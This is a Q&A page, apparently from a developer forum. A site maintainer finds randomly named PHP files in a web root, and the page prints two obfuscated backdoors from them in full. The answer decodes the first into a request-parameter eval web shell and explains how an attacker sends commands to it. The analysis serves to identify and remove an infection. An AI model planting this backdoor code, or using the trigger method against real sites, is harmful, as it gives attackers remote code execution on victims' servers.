Search code examples
phpapachemalware

Strange PHP Files In web root

I found several strange files in the public_html directory of a sight I'm working on. I call them strange because:

  1. They are named things like wolakfie.php,txvepdhxy.php, etc.
  2. They contain seemingly useless code - not obviously malicious, but certainly suspicious.
  3. I didn't put them there.

Now, I'm not the first developer to work on this site, so they could in theory, have done something in the past. Here is an example of the contents of one of the files:

    <?php
    $immanuel='JP';$armory='[L[r=t_ii';$forehead='e';$avowal ='G$I(P'; $hewett ='r';$blockading='c'; $folly= ' '; $balking='c';$caste= '$'; $aspirate ='?ca=R';$hegemony =')t,)aRo]';
    $closing = 'e'; $knell ='epI$';

    $delays ='R';$authors ='t';
    $immortal ='r'; $displace='S'; $decomposition = 's'; $bastard = 'S';$aurelia='G'; $bisexual= 'H'; $canteen='R';$cager = 'O'; $lorain= 'r]Ogp$';$branden = 'r'; $durant ='(';$lacquered='?gD)(<ls$';$dreamt = '[tPv';$earls ='N;o")(_('; $flowing = 'o';$lactate =';'; $cabaret = 'ri"g)sEyr';
    $censor = '@';
    $asparagus= 'T""';
    $graying= 'leopua';
    $casper = 'e';$kiah='sraKTO';$become = 'CiiS';$flak= ':';
    $madmax='_n(H';$economizing= 'Egf$v'; $clatter = 'O';

    $indolently = '(';$interconnection= 'd';

    $indefinite= 'n'; $georgina='veno';
    $deviate ='v'; $appropriating='i'; $cocksure= 'oO,)AmHsa';$efface= '(sisL_]e';$influences='U'; $inched='F';$juxtaposes= 'a'; $jenna='Oc6reetO';

    $colly= 'S';$corundum = '=i"PEosLE';

    $icebergs ='f';$birchen= 'pP'; $brainwashes= 'QH))__';
    $decoded ='tB$eTgod';$brooding= 'V';$equipoise = ':;_(eely';

    $indignation='[';$brooks ='dQCohi_b'; $directing= '"';$inspirer= 'h';$gypping ='aOra)E';
    $courier= '$'; $korey = 'e';$dropping= 'G'; $difficulties = ')';

    $creature='K';
    $blindfold = 'sa_T';

    $dune ='r'; $badger= 'Hl(u'; $imagen = 'E'; $grasp = 'T';$apace='a';
    $hunter= '$)4]';

    $derision =';';$excoriate = 't';$auditor= '?';

    $gecko='_(a';$checkbook = 'MSee$>s'; $foursome ='O_""'; $eben= $jenna['1'] .

    $dune.$checkbook[3]. $gecko['2'] . $excoriate.
    $checkbook[3] . $foursome['1'] . $icebergs. $badger['3'] .
    $georgina['2']. $jenna['1'] .$excoriate. $brooks['5'].$brooks['3'] . $georgina['2'] ;$delano =$folly ;$blanching= $eben ($delano,$checkbook[3]. $deviate . $gecko['2'].$badger['1'] .

    $gecko['1'] .$gecko['2'].$dune.$dune. $gecko['2'] .$equipoise['7'].$foursome['1'] . $birchen['0'] . $brooks['3'] .
    $birchen['0']. $gecko['1'].

    $icebergs.$badger['3'] .

    $georgina['2'] .

    $jenna['1'] .$foursome['1']. $decoded['5'] . $checkbook[3] .

    $auditor ,

    $excoriate.$foursome['1'].
    $gecko['2'] .$dune.$decoded['5']. $checkbook[6] .

    $gecko['1'] .$hunter['1'].

    $hunter['1'] . $hunter['1'] .
    $derision ); $blanching ($auditor,$cocksure['2'] , $evered['5'] ,

    $fineness,
    $baths['5'] ,$checkbook['4'], $cocksure['4'] ,
    $brooks['7'] ,
    $checkbook['4'].
    $brooks['5'].$corundum['0'] .

    $gecko['2'] .$dune. $dune .$gecko['2'] .$equipoise['7'] . $foursome['1'] .$cocksure['5'].$checkbook[3]. $dune. $decoded['5'] .

    $checkbook[3].$gecko['1'].

    $checkbook['4'] . $foursome['1']. $canteen .$imagen.
    $brooks[1].$influences.

    $imagen. $checkbook['1']. $grasp . $cocksure['2'].$checkbook['4'] . $foursome['1'] .$brooks['2'] . $foursome[0] .$foursome[0] .$creature. $knell['2'].$imagen . $cocksure['2'].$checkbook['4'].$foursome['1'] . $checkbook['1'] . $imagen .

    $canteen. $brooding.$imagen. $canteen . $hunter['1'] . $derision.

    $checkbook['4'].$gecko['2']. $corundum['0']. $brooks['5'].
    $checkbook[6] . $checkbook[6] . $checkbook[3].$excoriate .$gecko['1']. $checkbook['4'] .$brooks['5']. $indignation.
    $foursome['3']. $checkbook[6].$brooks['3'] . $brooks['3'] .$brooks['3'] .$badger['1'].$birchen['0']. $inspirer .$decoded['5'] .$foursome['3']. $hunter['3'].$hunter['1'] . $auditor . $checkbook['4'] . $brooks['5'] .
    $indignation. $foursome['3']. $checkbook[6] .$brooks['3'].$brooks['3'].$brooks['3'] .$badger['1'].$birchen['0'] .

    $inspirer . $decoded['5'].$foursome['3'] . $hunter['3'] .

    $equipoise['0'] .
    $gecko['1'].$brooks['5'].$checkbook[6] . $checkbook[6].$checkbook[3] . $excoriate. $gecko['1'] . $checkbook['4']. $brooks['5']. $indignation.
    $foursome['3'] . $badger[0].

    $grasp.$grasp .
    $birchen['1'] .
    $foursome['1'] . $checkbook['1'] . $foursome[0] .$foursome[0]. $foursome[0]. $corundum['7'] .$birchen['1'].

    $badger[0].$dropping .$foursome['3']. $hunter['3']. $hunter['1']. $auditor .$checkbook['4'].
    $brooks['5'].

    $indignation.$foursome['3'] .

    $badger[0] .$grasp .$grasp .
    $birchen['1'] .$foursome['1'] .$checkbook['1'].$foursome[0] .$foursome[0] .$foursome[0].$corundum['7'] . $birchen['1'] .$badger[0] .

    $dropping .$foursome['3'] . $hunter['3']. $equipoise['0']. $brooks['0'].$brooks['5']. $checkbook[3].$hunter['1'] .

    $derision .$checkbook[3].
    $deviate.$gecko['2'].$badger['1'] . $gecko['1'] .$checkbook[6]. $excoriate . $dune.$dune.$checkbook[3]. $deviate. $gecko['1'] .

    $brooks['7'].

    $gecko['2']. $checkbook[6] .$checkbook[3].$jenna['2'] . $hunter['2'].$foursome['1'] .

    $brooks['0'] .
    $checkbook[3].$jenna['1'] .$brooks['3'] .$brooks['0'].

    $checkbook[3].$gecko['1'] .$checkbook[6]. $excoriate. $dune .$dune.
    $checkbook[3] . $deviate.

    $gecko['1'] .$checkbook['4']. $gecko['2'] . $hunter['1'].

    $hunter['1'].

    $hunter['1'] .
    $hunter['1'] .$derision );

No obvious base64_encode or eval, but the strangeness and apparent irrelevance of the code has me raise my eyebrows a little. I will probably just delete them, but I wondered first if anyone could offer any insight. The site is on a shared Linux server hosted by GoDaddy.

UPDATE: I found another one that looks like it has some eval:

<?php $oypsfe=chr(99).chr(114)."e"."\x61"."\x74"."\x65"."\x5f".chr(102).chr(117)."\x6e"."c"."\x74"."i"."\x6f"."n";$rfktbj = $oypsfe('$a',strrev(';)a$(lave')); $rfktbj(strrev(';))"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"(edoced_46esab(lave'));?>

The upshot of my question is:

  • What does this code do or how can I find out what this code does?
  • AND If I've been hacked, where should I look for how to deal with the problem?
Solution

  • They contain seemingly useless code - not obviously malicious, but certainly suspicious.

    They are extremely malicious.

    Relevant bits from the first code: 

    $i=array_merge($_REQUEST,$_COOKIE,$_SERVER);
$a=isset($i["sooolphg"])?$i["sooolp‌​hg"]:(isset($i["HTTP_SOOOLPHG"])?
  $i["HTTP_SOOOLPHG"] : die);
eval(strrev(base64_deco‌​de(strrev($a))));

    It can pass in pretty much any payload via request parameters or URL query strings. So anyone making a request like filename.php?sooolphg=1&HTTP_SOOLPHG=shellAccessEasilyHere can gain access by having the payload evaled. The parameter shellAccessEasilyHere is a command string - reversed, then base64-ed, then finally reversed again. Something like ==QZjh2bgICSlxGbvByVvJHbkJyO would echo "Hello World".

    You can see the code from the other script here (I'm not posting it here for obvious reasons): ideone.com/sUCJee

    You'll be safe once you remove all the infected files. Make sure that the infection didn't get inside your own files.

    Good thing that you pulled the uninfected (make sure it really is so) version from git.